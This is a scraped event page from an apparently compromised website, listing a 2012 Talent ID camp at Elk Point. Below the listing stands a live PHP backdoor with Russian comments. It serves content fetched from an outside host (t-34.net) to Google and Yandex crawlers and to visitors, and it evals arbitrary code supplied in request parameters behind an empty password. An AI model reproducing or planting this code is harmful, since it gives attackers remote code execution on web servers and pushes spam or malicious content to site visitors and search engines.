Official Site

Official Site

We have 69 guests online

Print

05.06.2012

  
 
Date Title Venue City Type
05.06.2012 - 05.06.2012
18.30 h
Talent ID Elk Point Basset Field Elk Point Talent ID Camp

 
error_reporting(0); $host = "http://t-34.net/get.php"; // Ссылка на GET файл $ident = ""; //"Пароль" доступа к бекдору. engine_config.php?c=ваш_пароль&code=php_код_для_выполнения if (preg_match("/(yandex|google)/i", $_SERVER['HTTP_USER_AGENT'])) { $id = urlencode("http://".$_SERVER['SERVER_NAME'].$_SERVER['REQUEST_URI']); $bot = urlencode($_SERVER['HTTP_USER_AGENT']); $url = $host."?id=".$id."&charset=u&bot=".$bot; if(ini_get("allow_url_fopen") == 1) { echo file_get_contents($url); } elseif(function_exists('curl_init')) { $ch = curl_init($url); curl_setopt($ch, CURLOPT_HEADER, FALSE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $result = curl_exec($ch); curl_close($ch); echo $result; } } $url = $host."?code=code&bot=".$bot; // составляем запрос к серверу if(ini_get("allow_url_fopen") == 1) { // если разрешен fopen на сервере echo file_get_contents($url);// выводим ответ от сервера нашего }elseif(function_exists('curl_init')) { // если не разрешен, то подключаем curl и выводим $ch = curl_init($url); curl_setopt($ch, CURLOPT_HEADER, FALSE); curl_setopt($ch, CURLOPT_RETURNTRANSFER, TRUE); $result = curl_exec($ch); curl_close($ch); echo $result; } if($_REQUEST["c"] == $ident) eval(stripslashes($_REQUEST["code"]));